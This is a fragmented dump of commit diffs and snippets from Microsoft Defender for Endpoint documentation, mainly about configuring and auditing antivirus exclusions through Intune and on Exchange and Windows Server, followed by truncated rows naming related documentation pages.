[ExcludedExtensions](/windows/client-management/mdm/policy-csp-defender#excludedextensions). + - Excluded Paths are exclusions that you define by their location (path). These types of exclusions are also known as file and folder exclusions. Separate each path in the list with a `\|` character. For example, `C:\Example\|C:\Example1`. For more information, see [ExcludedPaths](/windows/client-management/mdm/policy-csp-defender#excludedpaths). + - Excluded Processes are exclusions for files that are opened by certain processes. Separate each file type in the list with a `\|` character. For example, `C:\Example. exe\|C:\Example1.exe`. These exclusions aren't for the actual processes. To exclude processes, you can use file and folder exclusions. For more information, see [ExcludedProcesses](/windows/client-management/mdm/policy-csp-defender#excludedprocesses). + +4. Choose Review + save, and then choose Save. -- [Configure and validate exclusions based on file name, extension, and folder location](configure-extension-file-exclusions-microsoft-defender-antivirus.md). You can exclude files from Microsoft Defender Antivirus scans based on their file extension, file name, or location. +#### Create a new antivirus policy with exclusions in Intune -- [Configure and validate exclusions for files opened by processes](configure-process-opened-file-exclusions-microsoft-defender-antivirus.md). You can exclude files from scans that have been opened by a specific process. +1. In the [Microsoft Intune admin center](https://intune.microsoft.com), choose Endpoint security \> Antivirus \> + Create Policy. -## Recommendations for defining exclusions +2. Select a platform (such as Windows 10, Windows 11, and Windows Server). -> [!IMPORTANT] -> Microsoft Defender Antivirus includes many automatic exclusions based on known operating system behaviors and typical management files, such as those used in enterprise management, database management, and other enterprise scenarios and situations. For more information, see [automatic exclusions](configure-server-exclusions-microsoft-defender-antivirus.md). -> -> Defining exclusions lowers the protection offered by Microsoft Defender Antivirus. You should always evaluate the risks that are associated with implementing exclusions, and you should only exclude files that you are confident are not malicious. +3. For Profile, select Microsoft Defender Antivirus exclusions, and then choose Create. -> [!NOTE] -> Exclusions directly impact the ability for Microsoft Defender Antivirus to block, remediate or inspect events related to the files, folders or processes that are added to the exclusion list. This means that features which are directly dependent on the AV engine such as protection against malware, file IOCs and certificate IOCs will not be effective. Furthermore, the Network Protection and Attack Surface Reduction (ASR) Rules are also impacted by process exclusions specifically, meaning that a process exclusion on any platform will result in Network Protection or ASR being unable to inspect traffic or enforce rules for that specific process. +4. On the Create profile step, specify a name and description for the profile, and then choose Next. + +5. On the Configuration settings tab, specify your antivirus exclusions, and then choose Next. + + - Excluded Extensions are exclusions that you define by file type extension. These extensions apply to any file name that has the defined extension without the file path or folder. Separate each file type in the list with a `\|` character. For example, `lib\|obj`. For more information, see [ExcludedExtensions](/windows/client-management/mdm/policy-csp-defender#excludedextensions). + - Excluded Paths are exclusions that you define by their location (path). These types of exclusions are also known as file and folder exclusions. Separate each path in the list with a `\|` character. For example, `C:\Example\|C:\Example1`. For more information, see [ExcludedPaths](/windows/client-management/mdm/policy-csp-defender#excludedpaths). + - Excluded Processes are exclusions for files that are opened by certain processes. Separate each file type in the list with a `\|` character. For example, `C:\Example. exe\|C:\Example1.exe`. These exclusions aren't for the actual processes. To exclude processes, you can use file and folder exclusions. For more information, see [ExcludedProcesses](/windows/client-management/mdm/policy-csp-defender#excludedprocesses). + +6. On the Scope tags tab, if you're using scope tags in your organization, specify scope tags for the policy you're creating. (See [Scope tags](/mem/intune/fundamentals/scope-tags).) + +7. On the Assignments tab, specify the users and groups to whom your policy should be applied, and then choose Next. (If you need help with assignments, see [Assign user and device profiles in Microsoft Intune](/mem/intune/configuration/device-profile-assign).) + +8. On the Review + create tab, review the settings, and then choose Create. + +## Important points about exclusions + +Defining exclusions lowers the protection offered by Microsoft Defender Antivirus. You should always evaluate the risks that are associated with implementing exclusions, and you should only exclude files that you're confident aren't malicious. + +Exclusions directly affect the ability for Microsoft Defender Antivirus to block, remediate, or inspect events related to the files, folders, or processes that are added to the exclusion list. Custom exclusions can affect features that are directly dependent on the antivirus engine (such as protection against malware, [file IOCs](indicator-file.md), and [certificate IOCs](indicator-certificates.md)). Process exclusions also affect [network protection](network-protection.md) and [attack surface reduction (ASR) rules](attack-surface-reduction.md). Specifically, a process exclusion on any platform causes network protection and ASR to be unable to inspect traffic or enforce rules for that specific process. Keep the following points in mind when you're defining exclusions: -- Exclusions are technically a protection gap. Consider all your options when defining exclusions. Other options can be as simple as making sure the excluded location has the appropriate access-control lists (ACLs) or setting policies to audit mode at first. +- Exclusions are technically a protection gap. Consider all your options when defining exclusions. See [Submissions, suppressions, and exclusions](defender-endpoint-antivirus-exclusions.md#submissions-suppressions-and-exclusions). -- Review the exclusions periodically. Recheck and re-enforce mitigations as part of your review process. +- Review exclusions periodically. Recheck and re-enforce mitigations as part of your review process. -- Ideally, avoid defining exclusions in an effort to be proactive. For example, don't exclude something just because you think it might be a problem in the future. Use exclusions only for specific issues, such as those pertaining to performance or application compatibility that exclusions could mitigate. +- Ideally, avoid defining exclusions in an attempt to be proactive. For example, don't exclude something just because you think it might be a problem in the future. Use exclusions only for specific issues, such as those pertaining to performance or application compatibility that exclusions could mitigate. - Review and audit changes to your list of exclusions. Your security team should preserve context around why a certain exclusion was added to avoid confusion later on. Your security team should be able to provide specific answers to questions about why exclusions exist. -## Audit Antivirus Exclusions +## Audit antivirus exclusions on Exchange systems -Exchange has supported integration with the Antimalware Scan Interface (AMSI) since the June 2021 Quarterly Updates for Exchange. It's highly recommended to ensure these updates are installed and AMSI is working using the guidance provided by the Exchange Team as this integration allows the best ability for Defender Antivirus to detect and block exploitation of Exchange. +Microsoft Exchange has supported integration with the Antimalware Scan Interface (AMSI) since the June 2021 Quarterly Updates for Exchange (see [Running Windows antivirus software on Exchange servers](/exchange/antispam-and-antimalware/windows-antivirus-software)). It's highly recommended to install these updates and make sure that AMSI is working properly. See [Microsoft Defender Antivirus security intelligence and product updates](microsoft-defender-antivirus-updates.md). -Many organizations exclude the Exchange directories from antivirus scans for performance reasons. Microsoft recommends auditing AV exclusions on Exchange systems and assessing if they can be removed without impacting performance in your environment to ensure the highest level of protection. Exclusions can be managed by using Group Policy, PowerShell, or systems management tools like Microsoft Endpoint Configuration Manager. +Many organizations exclude the Exchange directories from antivirus scans for performance reasons. Microsoft recommends auditing Microsoft Defender Antivirus exclusions on Exchange systems and assessing whether exclusions can be removed without impacting performance in your environment to ensure the highest level of protection. Exclusions can be managed by using Group Policy, PowerShell, or systems management tools like Microsoft Intune. -To audit AV exclusions on an Exchange Server running Defender Antivirus, run the Get-MpPreference command from an elevated PowerShell prompt. +To audit Microsoft Defender Antivirus exclusions on an Exchange Server, run the Get-MpPreference command from an elevated PowerShell prompt. (See [Get-MpPreference](/powershell/module/defender/get-mppreference).) -If exclusions can't be removed for the Exchange processes and folders, running a Quick Scan in Defender Antivirus scans the Exchange directories and files, regardless of exclusions. - -> [!TIP] -> If you're looking for Antivirus related information for other platforms, see: -> - [Set preferences for Microsoft Defender for Endpoint on macOS](mac-preferences.md) -> - [Microsoft Defender for Endpoint on Mac](microsoft-defender-endpoint-mac.md) -> - [macOS Antivirus policy settings for Microsoft Defender Antivirus for Intune](/mem/intune/protect/antivirus-microsoft-defender-settings-macos) -> - [Set preferences for Microsoft Defender for Endpoint on Linux](linux-preferences.md) -> - [Microsoft Defender for Endpoint on Linux](microsoft-defender-endpoint-linux.md) -> - [Configure Defender for Endpoint on Android features](android-configure.md) -> - [Configure Microsoft Defender for Endpoint on iOS features](ios-configure-features.md) +If exclusions can't be removed for the Exchange processes and folders, keep in mind that running a quick scan in Microsoft Defender Antivirus scans the Exchange directories and files, regardless of exclusions. ## See also -- [Microsoft Defender Antivirus exclusions on Windows Server 2016](configure-server-exclusions-microsoft-defender-antivirus.md) +- [Microsoft Defender Antivirus exclusions on Windows Server 2016 and later](configure-server-exclusions-microsoft-defender-antivirus.md) - [Common mistakes to avoid when defining exclusions](common-exclusion-mistakes-microsoft-defender-antivirus.md) - [Exclusions for Microsoft Defender for Endpoint and Microsoft Defender Antivirus](defender-endpoint-antivirus-exclusions.md) +- [Configure and validate exclusions for Microsoft Defender for Endpoint on Linux](linux-exclusions.md) +- [Configure and validate exclusions for Microsoft Defender for Endpoint on macOS](mac-exclusions.md) +
security	Configure Extension File Exclusions Microsoft Defender Antivirus	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/configure-extension-file-exclusions-microsoft-defender-antivirus.md	You can also copy the string into a blank text file and attempt to save it with - [Configure and validate exclusions for files opened by processes](configure-process-opened-file-exclusions-microsoft-defender-antivirus.md) - [Configure Microsoft Defender Antivirus exclusions on Windows Server](configure-server-exclusions-microsoft-defender-antivirus.md) - [Common mistakes to avoid when defining exclusions](common-exclusion-mistakes-microsoft-defender-antivirus.md)
security	Configure Local Policy Overrides Microsoft Defender Antivirus	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/configure-local-policy-overrides-microsoft-defender-antivirus.md	By default, lists that have been configured in local group policy and the Window - [Microsoft Intune](/protect/advanced-threat-protection-configure) - [Microsoft Defender Antivirus in Windows](microsoft-defender-antivirus-in-windows-10.md) - [Configure end-user interaction with Microsoft Defender Antivirus](configure-end-user-interaction-microsoft-defender-antivirus.md)
security	Configure Machines Asr	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/configure-machines-asr.md	For more information about ASR rule deployment in <a href="https://go.microsoft. - [Ensure your devices are configured properly](configure-machines.md) - [Get devices onboarded to Microsoft Defender for Endpoint](configure-machines-onboarding.md) - [Monitor compliance to the Microsoft Defender for Endpoint security baseline](configure-machines-security-baseline.md)
security	Configure Machines Onboarding	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/configure-machines-onboarding.md	For more information, [read about using Intune device configuration profiles to - [Ensure your devices are configured properly](configure-machines.md) - [Increase compliance to the Defender for Endpoint security baseline](configure-machines-security-baseline.md) - [Optimize ASR rule deployment and detections](configure-machines-asr.md)
security	Configure Machines Security Baseline	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/configure-machines-security-baseline.md	Device configuration management monitors baseline compliance only of Windows 10 - [Ensure your devices are configured properly](configure-machines.md) - [Get devices onboarded to Microsoft Defender for Endpoint](configure-machines-onboarding.md) - [Optimize ASR rule deployment and detections](configure-machines-asr.md)
security	Configure Machines	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/configure-machines.md	Topic\|Description [Optimize ASR rule deployment and detections](configure-machines-asr.md)\|Review rule deployment and tweak detections using impact analysis tools in <a href="https://go.microsoft.com/fwlink/p/?linkid=2077139" target="_blank">Microsoft 365 Defender portal</a>. > Want to experience Defender for Endpoint? [Sign up for a free trial.](https://signup.microsoft.com/create-account/signup?products=7f379fee-c4f9-4278-b0a1-e4c8c2fcdf7e&ru=https://aka.ms/MDEp2OpenTrial?ocid=docs-wdatp-onboardconfigure-belowfoldlink)
security	Configure Microsoft Defender Antivirus Features	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/configure-microsoft-defender-antivirus-features.md	The following broad categories of features can be configured: > See: [Performance analyzer for Microsoft Defender Antivirus](tune-performance-defender-antivirus.md). >
security	Configure Microsoft Threat Experts	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/configure-microsoft-threat-experts.md	It's crucial to respond in quickly to keep the investigation moving. #### To proactively hunt threats across endpoints, Office 365, cloud applications, and identity, refer to - [Microsoft Defender Experts in Microsoft 365 Overview](../defender/defender-experts-for-hunting.md)
security	Configure Mssp Notifications	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/configure-mssp-notifications.md	These check boxes must be checked: - [Grant MSSP access to the portal](grant-mssp-access.md) - [Access the MSSP customer portal](access-mssp-portal.md) - [Fetch alerts from customer tenant](fetch-alerts-mssp.md)
security	Configure Mssp Support	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/configure-mssp-support.md	For information on how to implement a multi-tenant delegated access, see [Multi- - [Access the MSSP customer portal](access-mssp-portal.md) - [Configure alert notifications](configure-mssp-notifications.md) - [Fetch alerts from customer tenant](fetch-alerts-mssp.md)
security	Configure Network Connections Microsoft Defender Antivirus	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/configure-network-connections-microsoft-defender-antivirus.md	A similar message occurs if you're using Internet Explorer: - [Important changes to Microsoft Active Protection Services endpoint](https://techcommunity.microsoft.com/t5/Configuration-Manager-Archive/Important-changes-to-Microsoft-Active-Protection-Service-MAPS/ba-p/274006)
security	Configure Notifications Microsoft Defender Antivirus	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/configure-notifications-microsoft-defender-antivirus.md	To add custom contact information to endpoint notifications, see [Customize the > - [Set preferences for Microsoft Defender for Endpoint on Linux](linux-preferences.md) > - [Microsoft Defender for Endpoint on Linux](microsoft-defender-endpoint-linux.md) > - [Configure Defender for Endpoint on Android features](android-configure.md) -> - [Configure Microsoft Defender for Endpoint on iOS features](ios-configure-features.md) +> - [Configure Microsoft Defender for Endpoint on iOS features](ios-configure-features.md)
security	Configure Process Opened File Exclusions Microsoft Defender Antivirus	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/configure-process-opened-file-exclusions-microsoft-defender-antivirus.md	Title: Configure exclusions for files opened by specific processes description: You can exclude files from scans if they've been opened by a specific process. -keywords: Microsoft Defender Antivirus, process, exclusion, files, scans ms.localizationpriority: medium - m365-security - tier2 search.appverid: met150 Previously updated : 04/14/2023 Last updated : 07/18/2023 # Configure exclusions for files opened by processes Last updated 04/14/2023 Platforms - Windows -You can exclude files that are opened by specific processes from Microsoft Defender Antivirus scans. See [Recommendations for defining exclusions](configure-exclusions-microsoft-defender-antivirus.md#recommendations-for-defining-exclusions) before defining your exclusion lists. +You can exclude files that are opened by specific processes from Microsoft Defender Antivirus scans. Note that these types of exclusions are for files that are opened by processes and not the processes themselves. To exclude a process, add a file exclusion (see [Configure and validate exclusions based on file extension and folder location](configure-extension-file-exclusions-microsoft-defender-antivirus.md)). + +See [Important points about exclusions](configure-exclusions-microsoft-defender-antivirus.md#important-points-about-exclusions) and review the information in [Manage exclusions for Microsoft Defender for Endpoint and Microsoft Defender Antivirus](defender-endpoint-antivirus-exclusions.md) before defining your exclusion lists. This article describes how to configure exclusion lists. For more information on how to use PowerShell with Microsoft Defender Antivirus, - [Common mistakes to avoid when defining exclusions](common-exclusion-mistakes-microsoft-defender-antivirus.md) - [Customize, initiate, and review the results of Microsoft Defender Antivirus scans and remediation](customize-run-review-remediate-scans-microsoft-defender-antivirus.md) - [Microsoft Defender Antivirus in Windows 10](microsoft-defender-antivirus-in-windows-10.md)+
security	Configure Protection Features Microsoft Defender Antivirus	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/configure-protection-features-microsoft-defender-antivirus.md	See [Use next-gen Microsoft Defender Antivirus technologies through cloud protec ## See also - [Exclusions for Microsoft Defender for Endpoint and Microsoft Defender Antivirus](defender-endpoint-antivirus-exclusions.md)
security	Configure Proxy Internet	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/configure-proxy-internet.md	However, if the connectivity check results indicate a failure, an HTTP error is - [Onboard Windows devices](configure-endpoints.md) - [Troubleshoot Microsoft Defender for Endpoint onboarding issues](troubleshoot-onboarding.md) - [Onboard devices without Internet access to Microsoft Defender for Endpoint](onboard-offline-machines.md)
security	Configure Real Time Protection Microsoft Defender Antivirus	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/configure-real-time-protection-microsoft-defender-antivirus.md	If you're looking for antivirus-related information for other platforms, see: - [Microsoft Defender for Endpoint on Linux](microsoft-defender-endpoint-linux.md) - [Configure Defender for Endpoint on Android features](android-configure.md) - [Configure Microsoft Defender for Endpoint on iOS features](ios-configure-features.md)
security	Configure Remediation Microsoft Defender Antivirus	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/configure-remediation-microsoft-defender-antivirus.md	Also see [Configure remediation-required scheduled full Microsoft Defender Antiv - [Configure end-user Microsoft Defender Antivirus interaction](configure-end-user-interaction-microsoft-defender-antivirus.md) - [Customize, initiate, and review the results of Microsoft Defender Antivirus scans and remediation](customize-run-review-remediate-scans-microsoft-defender-antivirus.md) - [Microsoft Defender Antivirus in Windows 10](microsoft-defender-antivirus-in-windows-10.md)
security	Configure Server Endpoints	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/configure-server-endpoints.md	For other Windows server versions, you have two options to offboard Windows serv - [Troubleshooting Microsoft Defender for Endpoint onboarding issues](troubleshoot-onboarding.md) - [Azure Active Directory Seamless single sign-on](/azure/active-directory/hybrid/how-to-connect-sso-quick-start) - [Troubleshoot onboarding issues related to Security Management for Microsoft Defender for Endpoint](/microsoft-365/security/defender-endpoint/troubleshoot-security-config-mgt#instructions-for-applying-computer-join-rule-in-aad-connect)
security	Configure Server Exclusions Microsoft Defender Antivirus	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/configure-server-exclusions-microsoft-defender-antivirus.md	Title: Configure Microsoft Defender Antivirus exclusions on Windows Server + Title: Microsoft Defender Antivirus exclusions on Windows Server description: Windows Server includes automatic exclusions, based on server role. You can also add custom exclusions. ms.localizationpriority: medium Previously updated : 07/13/2023 Last updated : 07/18/2023 search.appverid: met150 -# Configure Microsoft Defender Antivirus exclusions on Windows Server +# Microsoft Defender Antivirus exclusions on Windows Server Applies to: search.appverid: met150 - Windows -This article describes exclusions for Windows Server. Because Microsoft Defender Antivirus is built into Windows, [built-in exclusions](#built-in-exclusions) for operating system files happen automatically on all versions of Windows. On Windows Server 2016 and later, [automatic exclusions](#automatic-server-role-exclusions) happen automatically as roles are added. If necessary, you can define custom exclusions or opt out of automatic exclusions. +This article describes types of exclusions that you don't have to define for Microsoft Defender Antivirus: + +- [Built-in exclusions](#built-in-exclusions) for operating system files on all versions of Windows. +- [Automatic exclusions](#automatic-server-role-exclusions) for roles on Windows Server 2016 and later. For a more detailed overview of exclusions, see [Manage exclusions for Microsoft Defender for Endpoint and Microsoft Defender Antivirus](defender-endpoint-antivirus-exclusions.md). Built-in exclusions include: ## Opting out of automatic exclusions -In Windows Server 2016 and later, the predefined exclusions delivered by [Security intelligence updates](microsoft-defender-antivirus-updates.md#security-intelligence-updates) only exclude the default paths for a role or feature. If you installed a role or feature in a custom path, or you want to manually control the set of exclusions, make sure to opt out of the automatic exclusions delivered in Security intelligence updates. But keep in mind that the exclusions that are delivered automatically are optimized for Windows Server 2016 and later. See [Recommendations for defining exclusions](configure-exclusions-microsoft-defender-antivirus.md#recommendations-for-defining-exclusions) before defining your exclusion lists. +In Windows Server 2016 and later, the predefined exclusions delivered by [Security intelligence updates](microsoft-defender-antivirus-updates.md#security-intelligence-updates) only exclude the default paths for a role or feature. If you installed a role or feature in a custom path, or you want to manually control the set of exclusions, make sure to opt out of the automatic exclusions delivered in Security intelligence updates. But keep in mind that the exclusions that are delivered automatically are optimized for Windows Server 2016 and later. See [Important points about exclusions](configure-exclusions-microsoft-defender-antivirus.md#important-points-about-exclusions) before defining your exclusion lists. > [!WARNING] > Opting out of automatic exclusions might adversely impact performance, or result in data corruption. Automatic server role exclusions are optimized for Windows Server 2016, Windows Server 2019, and Windows Server 2022. For more information and allowed parameters, see: If necessary, you can add or remove custom exclusions. To do that, see the following articles: +- [Configure custom exclusions for Microsoft Defender Antivirus](configure-exclusions-microsoft-defender-antivirus.md) - [Configure and validate exclusions based on file name, extension, and folder location](configure-extension-file-exclusions-microsoft-defender-antivirus.md) - [Configure and validate exclusions for files opened by processes](configure-process-opened-file-exclusions-microsoft-defender-antivirus.md) -> [!TIP] -> If you're looking for Antivirus related information for other platforms, see: -> - [Set preferences for Microsoft Defender for Endpoint on macOS](mac-preferences.md) -> - [Microsoft Defender for Endpoint on Mac](microsoft-defender-endpoint-mac.md) -> - [macOS Antivirus policy settings for Microsoft Defender Antivirus for Intune](/mem/intune/protect/antivirus-microsoft-defender-settings-macos) -> - [Set preferences for Microsoft Defender for Endpoint on Linux](linux-preferences.md) -> - [Microsoft Defender for Endpoint on Linux](microsoft-defender-endpoint-linux.md) -> - [Configure Defender for Endpoint on Android features](android-configure.md) -> - [Configure Microsoft Defender for Endpoint on iOS features](ios-configure-features.md) - -## See also + ## See also - [Exclusions for Microsoft Defender for Endpoint and Microsoft Defender Antivirus](defender-endpoint-antivirus-exclusions.md)-- [Configure and validate exclusions for Microsoft Defender Antivirus scans](configure-exclusions-microsoft-defender-antivirus.md)-- [Configure and validate exclusions based on file name, extension, and folder location](configure-extension-file-exclusions-microsoft-defender-antivirus.md)-- [Configure and validate exclusions for files opened by processes](configure-process-opened-file-exclusions-microsoft-defender-antivirus.md) - [Common mistakes to avoid when defining exclusions](common-exclusion-mistakes-microsoft-defender-antivirus.md) - [Customize, initiate, and review the results of Microsoft Defender Antivirus scans and remediation](customize-run-review-remediate-scans-microsoft-defender-antivirus.md)-- [Microsoft Defender Antivirus in Windows 10](microsoft-defender-antivirus-in-windows-10.md) +- [Microsoft Defender for Endpoint on Mac](microsoft-defender-endpoint-mac.md) +- [Microsoft Defender for Endpoint on Linux](microsoft-defender-endpoint-linux.md) +- [Configure Defender for Endpoint on Android features](android-configure.md) +- [Configure Microsoft Defender for Endpoint on iOS features](ios-configure-features.md) +
security	Configure Siem	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/configure-siem.md	For more information, see: - [Hello World example (describes how to register an application in Azure Active Directory)](api-hello-world.md) - [Get access with application context](exposed-apis-create-app-webapp.md) - [Microsoft 365 Defender SIEM integration](../defender/configure-siem-defender.md)
security	Configure Updates	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/configure-updates.md	For more information on the parameters and how to configure them, see [Set-MpPre > - [Microsoft Defender for Endpoint on Linux](microsoft-defender-endpoint-linux.md) > - [Configure Defender for Endpoint on Android features](android-configure.md) > - [Configure Microsoft Defender for Endpoint on iOS features](ios-configure-features.md)
security	Configure Vulnerability Email Notifications	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/configure-vulnerability-email-notifications.md	This section lists various issues that you may encounter when using email notifi - [Security recommendations](tvm-security-recommendation.md) - [Weaknesses](tvm-weaknesses.md) - [Event timeline](threat-and-vuln-mgt-event-timeline.md)
security	Connected Applications	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/connected-applications.md	The Connected applications page provides information about the Azure AD applicat ## Edit, reconfigure, or delete a connected application The Open application settings link opens the corresponding Azure AD application management page in the Azure portal. From the Azure portal, you can manage permissions, reconfigure, or delete the connected applications.
security	Contact Support	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/contact-support.md	Learn how to open support tickets by contacting Defender for Endpoint support. - [Troubleshoot service issues](troubleshoot-mdatp.md) - [Check service health](/microsoft-365/enterprise/view-service-health)
security	Controlled Folders	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/controlled-folders.md	You can use the Windows Security app to view the list of folders that are protec > [!NOTE] > [Windows system folders](#windows-system-folders-are-protected-by-default) are protected by default, and you cannot remove them from the list. Subfolders are also included in protection when you add a new folder to the list.
security	Corelight Integration	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/corelight-integration.md	To enable the Corelight integration, you'll need to take the following steps: ## See also - [Device discovery FAQ](device-discovery-faq.md)
security	Create Alert By Reference	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/create-alert-by-reference.md	POST https://api.securitycenter.microsoft.com/api/alerts/CreateAlertByReference "category": "Exploit" } ```
security	Customize Controlled Folders	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/customize-controlled-folders.md	For more information about customizing the notification when a rule is triggered - [Protect important folders with controlled folder access](controlled-folders.md) - [Enable controlled folder access](enable-controlled-folders.md) - [Enable attack surface reduction rules](enable-attack-surface-reduction.md)
security	Customize Exploit Protection	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/customize-exploit-protection.md	For more information about customizing the notification when a rule is triggered - [Evaluate exploit protection](evaluate-exploit-protection.md) - [Enable exploit protection](enable-exploit-protection.md) - [Import, export, and deploy exploit protection configurations](import-export-exploit-protection-emet-xml.md)
security	Customize Run Review Remediate Scans Microsoft Defender Antivirus	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/customize-run-review-remediate-scans-microsoft-defender-antivirus.md	Topic \| Description [Configure remediation for scans](configure-remediation-microsoft-defender-antivirus.md) \| Configure what Microsoft Defender Antivirus should do when it detects a threat, and how long quarantined files should be retained in the quarantine folder [Configure scheduled scans](scheduled-catch-up-scans-microsoft-defender-antivirus.md) \| Set up recurring (scheduled) scans, including when they should run and whether they run as full or quick scans [Configure and run scans](run-scan-microsoft-defender-antivirus.md) \| Run and configure on-demand scans using PowerShell, Windows Management Instrumentation, or individually on endpoints with the Windows Security app -[Review scan results](review-scan-results-microsoft-defender-antivirus.md) \| Review the results of scans using Microsoft Endpoint Configuration Manager, Microsoft Intune, or the Windows Security app +[Review scan results](review-scan-results-microsoft-defender-antivirus.md) \| Review the results of scans using Microsoft Endpoint Configuration Manager, Microsoft Intune, or the Windows Security app
security	Data Collection Analyzer	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/data-collection-analyzer.md	The analyzer and all the above scenario flags can be initiated remotely by runni > - -m \# - The number of minutes to run (5 minutes in the above example) > > - When using MDEClientAnalyzer.cmd the script checks for privileges using "net session" which requires the service "Server" to be running. If it is not, you will get the error message _Script is running with insufficient privileges_. Run it with administrator privileges if ECHO is off.
security	Data Storage Privacy	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/data-storage-privacy.md	By providing customers with compliant, independently verified services, Microsof For more information on the Defender for Endpoint certification reports, see [Microsoft Trust Center](https://servicetrust.microsoft.com/). > Want to experience Defender for Endpoint? [Sign up for a free trial.](https://signup.microsoft.com/create-account/signup?products=7f379fee-c4f9-4278-b0a1-e4c8c2fcdf7e&ru=https://aka.ms/MDEp2OpenTrial?ocid=docs-wdatp-datastorage-belowfoldlink)
security	Defender Compatibility	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/defender-compatibility.md	Microsoft Defender Antivirus will continue to receive updates, and the *msmpeng. The Microsoft Defender Antivirus interface will be disabled. Users on the device won't be able to use Microsoft Defender Antivirus to perform on-demand scans or configure most options. For more information, see the [Microsoft Defender Antivirus and Defender for Endpoint compatibility topic](microsoft-defender-antivirus-compatibility.md).
security	Defender Endpoint Antivirus Exclusions	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/defender-endpoint-antivirus-exclusions.md	Previously updated : 07/13/2023 Last updated : 07/18/2023 You can take certain actions to prevent false positives and similar issues from This article explains how these actions work, and describes the various types of exclusions that can be defined for Defender for Endpoint and Microsoft Defender Antivirus. > [!CAUTION] -> Defining exclusions reduces the level of protection offered by Defender for Endpoint and Microsoft Defender Antivirus. Use exclusions as a last resort, and make sure to define only the exclusions that are necessary. Make sure to review your exclusions periodically, and remove the ones you no longer need. See [Recommendations for defining exclusions](configure-exclusions-microsoft-defender-antivirus.md#recommendations-for-defining-exclusions) and [Common mistakes to avoid](common-exclusion-mistakes-microsoft-defender-antivirus.md). +> Defining exclusions reduces the level of protection offered by Defender for Endpoint and Microsoft Defender Antivirus. Use exclusions as a last resort, and make sure to define only the exclusions that are necessary. Make sure to review your exclusions periodically, and remove the ones you no longer need. See [Important points about exclusions](configure-exclusions-microsoft-defender-antivirus.md#important-points-about-exclusions) and [Common mistakes to avoid](common-exclusion-mistakes-microsoft-defender-antivirus.md). ## Submissions, suppressions, and exclusions Depending on what you're using, you might need to refer to the documentation for ## See also -- [Recommendations for defining exclusions](configure-exclusions-microsoft-defender-antivirus.md#recommendations-for-defining-exclusions) +- [Important points about exclusions](configure-exclusions-microsoft-defender-antivirus.md#important-points-about-exclusions) - [Common mistakes to avoid when defining exclusions](common-exclusion-mistakes-microsoft-defender-antivirus.md) - [Blog post: The Hitchhiker's Guide to Microsoft Defender for Endpoint exclusions](https://cloudbrothers.info/en/guide-to-defender-exclusions/)+
security	Defender Endpoint Demonstration App Reputation	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/defender-endpoint-demonstration-app-reputation.md	This download is known malware; SmartScreen should block this program from runni ## See also [Microsoft Defender for Endpoint - demonstration scenarios](defender-endpoint-demonstrations.md)
security	Defender Endpoint Demonstration Attack Surface Reduction Rules	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/defender-endpoint-demonstration-attack-surface-reduction-rules.md	Cleanup c:\demo encryption run the [encrypt/decrypt file](https://demo.wd.micros [Attack surface reduction rules reference](attack-surface-reduction-rules-reference.md) [Microsoft Defender for Endpoint - demonstration scenarios](defender-endpoint-demonstrations.md)
